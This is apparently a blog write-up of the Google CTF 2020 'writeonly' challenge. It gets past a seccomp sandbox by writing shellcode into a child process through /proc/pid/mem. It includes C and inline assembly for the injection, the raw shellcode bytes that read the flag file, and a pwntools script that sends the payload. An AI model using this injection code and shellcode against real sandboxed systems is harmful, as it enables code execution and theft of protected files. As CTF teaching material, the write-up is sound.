Google CTF 2020: writeonly

I participated in the 2020 Google CTF on the UBC CTF team Maple Bacon. Without their help, I would have probably given up out of frustration. Special thanks to Robert and Filip who put up with my many questions and swearing at the computer.

All the files for my solution are available on my GitHub.

I chose to do this challenge as nobody else on my team was working on it and it looked fairly approachable, after getting frustrated with the assembly of the reversing challenge beginner. Unfortunately, the assumption that I wouldn't have to do assembly in this one was completely false, but I tricked myself for long enough to have a proper go at it anyway.

The challenge gives as a description:

This sandbox executes any shellcode you send. But thanks to seccomp, you won't be able to read /home/user/flag.

What this means in practice is that there is a seccomp filter with an allow-list of system calls, that does not include read, however, as suggested by the challenge name, write and open are supported. This can be abused.

Shellcode in C and scaffolding

The challenge loads whatever you send it into a flat read-write-execute page.

I wanted to write my shellcode in C because, as mentioned, I didn't want to write assembly! So, I endeavored to figure out how to make that happen. This took more time than the challenge itself, but yak shaving is my specialty. I looked around on the internet for options and found SheLLVM which I couldn't figure out how to use, ShellcodeCompiler which doesn't support variables, and Binary Ninja scc which I don't have a license for.

As such, I tried to find prior art on Just Using a Normal Compiler. I found a good blog post with lots of details, but it was clearly trying to hack around properties of how executables are linked (and also I couldn't reproduce their string usage myself successfully, even with -O0).

The specific usage of this shellcode has a lot in common with microcontrollers and other embedded platforms in that the executable is loaded into memory and executed immediately. Eventually this led to messing about with linker scripts and staring at both binutils documentation and various linker scripts for bare-metal platforms.

I ended up writing the following linker script to ensure that all the functions were laid out as expected, annotating my _start function with __attribute__((section(".text.prologue"))) to make sure it gets put on top. It also stuffs the .rodata section into .text to simplify the binary layout (unsure if this is actually necessary).

ENTRY(_start);

SECTIONS
{
    . = ALIGN(16);
    .text :
    {
        *(.text.prologue)
        *(.text)
        *(.rodata)
    }
    .data :
    {
        *(.data)
    }

    /DISCARD/ :
    {
        *(.interp)
        *(.comment)
    }
}

Once the ELF is built (having this intermediate form is critical for debugging so I can find addresses of things and have symbols while reading the output assembly), it is objcopy'd with -O binary to emit the final shellcode binary that can be loaded directly into memory and executed.

The path to privilege escalation

Auditing the code for the challenge, I found that it forks a second process prior to dropping privileges, which runs a function, check_flag, in an infinite loop checking the validity of the flag. This seemed pretty suspicious since there is no reason to overwrite the flag (it would cause losing the flag).

pid_t pid = check(fork(), "fork");
if (!pid) {
  while (1) {
    check_flag();
  }
  return 0;
}

// ⬇ this is suspicious!!
printf("[DEBUG] child pid: %d\n", pid);
void_fn sc = read_shellcode();
setup_seccomp();
sc();

My path to the solution was first poking around procfs to see what could be abused. I struggled with /proc/$pid/stack, which appears to often be inaccessible. I also initially failed to figure out how /proc/$pid/mem worked, and assumed that it did not based on seeing an IO error.

As it turns out, this mem virtual file is basically just the entire memory mappings of the process as a file, and you can lseek to any point in it and use write to poke it. This sounded like it could enable execution to be taken over given write(2) on it, so it was what I went with.

Failed ROP attempt

Initially, I assumed falsely that it followed the mappings' access permissions, which I found out later from someone on my team that this was not true. So, I started out trying to write a Return Oriented Programming (ROP) chain to take control of execution.

I used ropper to find gadgets to set up the registers to syscall execve("/bin/cat", "/home/user/flag", NULL). I then overwrote the stack to try to get execution to go to my execve(2) after the return from nanosleep(2), assuming it would be fairly reliable since the process is spending most of its time in this syscall. This got close to working but after taking a break to sleep, I was informed that /proc/$pid/mem actually can change read-only memory regions and changed my approach to simply overwrite the process .text section with some shellcode.

The exploit

High level overview:

fd = open("/proc/$childPid/mem", O_RDWR)
lseek(fd, injectPos, SEEK_SET)
write(fd, evilCode, sizeof (evilCode))

Now that I have the pieces together, and can execute C in-process, it's time to write an exploit. One of the first things I have to contend with is constructing a path to /proc/$pid/mem. Well, I can't getpid() due to the syscall filter, and it wouldn't even help to find the child PID. This was the first challenge. I read the disassembly of the main function to try to find the PID since it would have been returned from fork and it is logged by the suspicious printf. As it turned out, it was indeed on the stack, so I wrote some evil inline assembly to get the value pointed to by rbp - 0x4.

The next step was to construct the path. I was unsure of the availability of C string and itoa-like functions in the environment, given that there is no standard library present, so I just wrote some. An interesting optimization of this nicked from later rewriting the exploit in Rust is that my itoa goes backwards, writing into a with a buffer containing extra slashes that will otherwise be ignored by the OS. This cut my executable size about in half by not having to reverse the string or perform string copies as one would have to do in a normal itoa.

    int pid;
    // well, we weren't allowed getpid so,
    // steal the pid from the caller's stack
    __asm__ __volatile__ (
        "mov %0, dword ptr [rbp - 0x4]\n"
        : "=r"(pid) ::);
    char pathbuf[64] = "/proc////////////mem";
    itoa_badly(pid, &pathbuf[15]);

Syscalls were performed with more inline assembly, this time lifted directly from the musl sources. Part of my motivation in not using a libc, besides binary size, is that libc requires a bunch more sections to be present in my binary, and I did not want to have to research how to deal with those.

I chose to inject my stage 2 shellcode right at the point where the loop of check_flag would jump back to the beginning as it is a position where it likely will work most of the time.

Stage 2 shellcode was generated with pwntools shellcraft. It was fairly trivial.

    int fd = syscall2(SYS_open, (uint64_t)(void *)pathbuf, O_RDWR);

    /* disassemble check_flag
     * (...)
     * 0x00000000004022d9 <+167>:   mov    edi,0x1
     * 0x00000000004022de <+172>:   call   0x44f2e0 <sleep>
     * 0x00000000004022e3 <+177>:   jmp    0x40223a <check_flag+8>
     */
    void *tgt = (void *)0x4022e3;
    syscall3(SYS_lseek, fd, (uint64_t)tgt, SEEK_SET);

    //////////////////////////////////////////////////////////////
    // Now, just write shellcode into memory at the injection point.
    /*
     * In [4]: sh = shellcraft.amd64.cat('/home/user/flag', 1) + shellcraft.amd64.infloop()
     * In [5]: print(sh)
     *     / * push b'/home/user/flag\x00' * /
     *     mov rax, 0x101010101010101
     *     push rax
     *     mov rax, 0x101010101010101 ^ 0x67616c662f7265
     *     xor [rsp], rax
     *     mov rax, 0x73752f656d6f682f
     *     push rax
     *     / * call open('rsp', 'O_RDONLY', 0) * /
     *     push SYS_open / * 2 * /
     *     pop rax
     *     mov rdi, rsp
     *     xor esi, esi / * O_RDONLY * /
     *     cdq / * rdx=0 * /
     *     syscall
     *     / * call sendfile(1, 'rax', 0, 2147483647) * /
     *     mov r10d, 0x7fffffff
     *     mov rsi, rax
     *     push SYS_sendfile / * 0x28 * /
     *     pop rax
     *     push 1
     *     pop rdi
     *     cdq / * rdx=0 * /
     *     syscall
     *     jmp $
     * In [7]: [hex(x) for x in asm(sh)]
     */
    char evil[] = {0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50,
        0x48, 0xb8, 0x64, 0x73, 0x2e, 0x67, 0x6d, 0x60, 0x66, 0x1, 0x48, 0x31,
        0x4, 0x24, 0x48, 0xb8, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x75, 0x73,
        0x50, 0x6a, 0x2 , 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x99, 0xf, 0x5,
        0x41, 0xba, 0xff, 0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a , 0x28,
        0x58, 0x6a, 0x1, 0x5f, 0x99, 0xf, 0x5, 0xeb, 0xfe};

    syscall3(SYS_write, fd, (uint64_t)(void *)evil, sizeof (evil));

I sent it with a simple pwntools script:

import os
import sys
from pwn import *

f = sys.argv[1]
fd = open(f, 'rb')
stat = os.stat(f)
sz = stat.st_size

io = remote('writeonly.2020.ctfcompetition.com', 1337)

# for `make serve`
# io = remote('localhost', 8000)

# you can gdb into the parent before we send malicious code
input()
io.sendline(str(sz))
io.send(fd.read())
io.interactive()

Then, the exciting moment:

ctf/writeonly » make send
python send.py shellcode.bin
[+] Opening connection to writeonly.2020.ctfcompetition.com on port 1337: Done

[*] Switching to interactive mode
[DEBUG] child pid: 2
shellcode length? reading 576 bytes of shellcode. CTF{why_read_when_you_can_write}
$

Learnings

Many. The one thing I did really right was making it easy to try again. Writing a Makefile for the various things I needed to run was immensely valuable so I didn't have to remember commands.

Late in the process I had a lot of trouble debugging a problem where the exploit chain would work on local processes but not remotely. It turned out to be that I was injecting in a location where it would sometimes corrupt execution state of the checking process depending on where it was, and was fixed by moving where I was injecting. However, I initially thought it was ASLR, so fought with gdb a bunch about that.

Filip suggested that I use socat TCP-LISTEN:8000,bind=localhost,reuseaddr,fork EXEC:./chal to essentially emulate the challenge server locally, and debug the remote process. If the process is not started with gdb it is more likely to be reproducible. This helped a lot in eliminating that as a variable while debugging.